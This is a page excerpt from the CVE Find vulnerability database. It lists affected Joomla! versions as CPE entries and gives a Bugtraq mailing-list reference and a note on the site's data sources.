- Joomla>>Joomla\! >> Version 3.9.11 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.12 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.13 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.14 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.15 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.16 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.17 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.19 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.20 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.21 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.22 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.22 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.23 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.23 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.23 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.24 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.24 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.25 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.26 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.27 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.9.28 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.4 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.5 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.6 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.7 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.8 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.9 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.10 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.11 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.12 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.13 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.14 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.15 (Open CPE detail)
- Joomla>>Joomla\! >> Version 3.10.16 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.4 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.5 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.6 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.7 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.8 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.2.9 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.3.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.3.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.3.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.3.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.3.4 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.4 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.5 (Open CPE detail)
- Joomla>>Joomla\! >> Version 4.4.6 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.0.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.0.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.0.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.0.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.1.0 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.1.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 5.1.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 11.2 (Open CPE detail)
- Joomla>>Joomla\! >> Version 11.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 11.4 (Open CPE detail)
- Joomla>>Joomla\! >> Version 12.1 (Open CPE detail)
- Joomla>>Joomla\! >> Version 12.3 (Open CPE detail)
- Joomla>>Joomla\! >> Version 13.1 (Open CPE detail)
References
http://www.securityfocus.com/archive/1/506444/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.